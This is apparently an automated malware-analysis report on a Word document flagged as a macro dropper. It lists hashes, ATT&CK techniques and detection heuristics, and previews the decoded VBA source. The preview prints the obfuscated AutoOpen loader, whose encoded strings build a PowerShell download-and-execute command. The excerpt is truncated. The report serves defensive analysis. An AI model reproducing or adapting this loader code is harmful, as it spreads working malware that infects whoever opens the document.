Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c739364981a283ee…

MALICIOUS

Office (OLE)

Size: 225.2 KB
Created: 2018-07-06 15:09:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 1fe45b8bb97bd71225db1421a6c50b77
SHA-1: 30453913a1d53972f832f6466388b296297b82d6
SHA-256: c739364981a283eefc63a7ec98a1786331e2a16ec4a955fc1a06085ed784e51b
Risk Score: 342

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File)

The sample contains an AutoOpen VBA macro that is heavily obfuscated and uses CreateObject and Shell calls. The script attempts to execute a PowerShell command that downloads and executes a payload from a hardcoded URL. This indicates dropper functionality: the macro's purpose is to fetch and run a second-stage malicious file.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-6602895-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6602895-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 5 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10132 bytes
SHA-256: 50af3048c614677b04578d686ba984725461363c39e6f0b08772f8b5189d0261

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "NQNfRZiBH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   SkjAm = (CbXzuN * iGaXD * vEjiz - taczk + (SaiKzW + 74811 - (3133 + nSvAt)))
   VDDCTd = (rLqdK * IlwCbl * wsAbiV - urckCn + (vptSzo + 34077 - (4272 + YiupQ)))
   iQRjL = (wmjIQ * ubiZA * QjZXM - pwNRit + (uzjvnt + 16275 - (61360 + vaJHkK)))
   SDXmCZ = (iGjks * ZdmRc * SYGEkC - ImoiEL + (rJuNtP + 1808 - (56241 + smCIQN)))
   IcIGw = (iLEfu * wjEqi * VNjrf - iTowNF + (iOwJF + 70748 - (44577 + szkjON)))
JVSUvafKHI (UwETdAwpMj + qIbifnQY + VSdkJ + tPLvqV)
   nkkwQ = (rWNVqM * pJfmN * qHDWp - FpiqlM + (ACIXj + 61920 - (95380 + iGhHz)))
   VTcOp = (kRwQb * QkzwdP * BXzFH - cQvHR + (NTZduc + 76375 - (79817 + MsIUvT)))
   WaFwL = (qqwfc * WfFNz * avpQS - irwEI + (MzdZlZ + 31864 - (31494 + jYbwia)))
   XjdihJ = (GjOuXK * MfbJl * AjmwF - nHAVO + (zOSvNC + 58587 - (89177 + wYImI)))
End Sub


Attribute VB_Name = "iqKIjirYFI"
Function UwETdAwpMj()
On Error Resume Next
WpvFvp = WzuOa * OccEn - tJXwX - vTlLJ
BuMYrjS = "wershell " + "    " + "    " + "    " + "     " + "[STR" + "iNg]::JOi" + "N" + Chr(40) + " '' ," + Chr(40) + " " + "'20_" + "124_67>6" + "5!13" + "!94K85>71"
KnurmB = 22873 + 14874 * sOzoA * idlZS - QnKXm + 59012
   QDUaMZ = 11363 + 8943 * NNtiV * cvWpz - lzsXq + 998
jLNALkuXX = "g29T95W8" + "2_90" + "d85K83!68" + "T16_126>8" + "5>68K" + "30!10" + "3>85W"
XIfzWp = 26159 + 38780 * kPbtG * oXIjWa - ORIRzj + 88163
   VYjUz = 50159 + 37053 * rTpUt * bBMkpK - EaDauA + 68083
bVrNY = "82g115!" + "92T89o8" + "5W94T68" + "_11T20" + "T119K6" + "5>66T" + "13i23o" + "88W68d6" + "8o64>10i" + "31i31d7" + "1i71!71>3" + "0W67d88"
zKftBJ = 92033 + 548 * AwhhMJ * pGdFH - ikjSTn + 50045
   hswhot = 15704 + 71711 * shFuSL * alWrz - ZdtOrF + 84423
GBfajmOwd = "T81!94i8" + "7>66!" + "89W92W81" + "_29d85T6" + "7K83o" + "81>64!8" + "5o67" + "K30!8" + "3T95" + "g93T" + "31i4i106"
GSivPY = 18061 + 21481 * lsqBQr * jrCwO - SSbvJi + 80090
HWjRnw = "d6_9" + "o86!8" + "6i124g31T" + "112T88T6" + "8i68_6" + "4g10K" + "31>3" + "1i71i7" + "1d71g30g6" + "7W89i" + "93i82!92"
VWLPtw = 78954 + 55220 * VkkCwz * djMqIm - rdtav + 29626
   zEbPdO = 14620 + 33100 * SbWori * aCEiz - ifzQT + 37720
iXfowSrhdI = "i89>67>6" + "7!89g68_7" + "3_30o8" + "3d95o30!" + "69>91>3" + "1i116!8K" + "74i67>116" + ">124g10" + "2T31" + "g112i"
UwETdAwpMj = BuMYrjS + jLNALkuXX + bVrNY + GBfajmOwd + HWjRnw + iXfowSrhdI
   aawif = 99128 + 90007 * DkaLKX * tPrrP - ZLhiD + 26838
   CWwEKZ = 97327 + 73270 * wPjwOB * fDnjGY - iSTlz + 43221
   nwPlkp = 17196 + 3873 * WjlRjw * NILzZW - fiBAO + 28571
End Function
Function qIbifnQY()
On Error Resume Next
buzcXT = 24503 + 39790 * idmhnn * zHKCN - jjUczv + 51199
   QuUsk = 39064 + 56167 * LLzlnD * JTKSsW - MLOPai + 35299
   IuQmLa = 48675 + 65169 * rjVIi * qMBRvC - RQqkHj + 77808
   tREHbK = 4127 + 42778 * zjdMY * jdDNH - drZoNO + 15510
cRwFlaacL = "88i68" + "!68_" + "64T10i" + "31W31!7" + "1K71" + "T71g30" + "_67K68o9" + "5_94g8" + "5T84T" + "85_6" + "7!89" + "i87_94"
NwPDKk = 40176 + 88584 * zWkmZA * BXZml - TsEZGK + 10332
   bDimJT = 77563 + 64897 * zrBKq * nsfuDp - wYhIi + 39492
dAmlUXPz = "T83_85o94" + "i68!85" + "d66W3" + "0_85W67" + ">31W105" + "K91d" + "2T71_" + "100>8i9_" + "31i1" + "12d88i68_" + "68!64"
dKowKC = 93133 + 57985 * HYurUU * FYLzJi - ithZhv + 15702
   oIjtm = 13566 + 62474 * Swjuh * PXXWH - uGMbf + 42923
wuAlAfE = ">10_31K31" + "d71d71!" + "71_30d67" + "!68o93" + "i92_85!" + "94!85d66g" + "87_73" + "g30g83" + ">95!30o" + "69i91K31T"
OihtHl = 91250 + 84766 * cXpjq * AWkfS - uWmHFI + 40055
   daKcY = 86681 + 66820 * wVAAuE * QUaoqb - SnijFv + 44201
   vcIKi = 68289 + 59311 * liPwN * amZVG - zauYF + 8554
   EiGBtD = 1086 + 43569 * bUiaww * dJCtB - YKiTL + 89930
pDWCNFHDjQ = "122o72W" + "82i121W31" + "W112" + ">88T68" + ">68K" + "64_10"
nIWduO = 11195 + 1
... (truncated)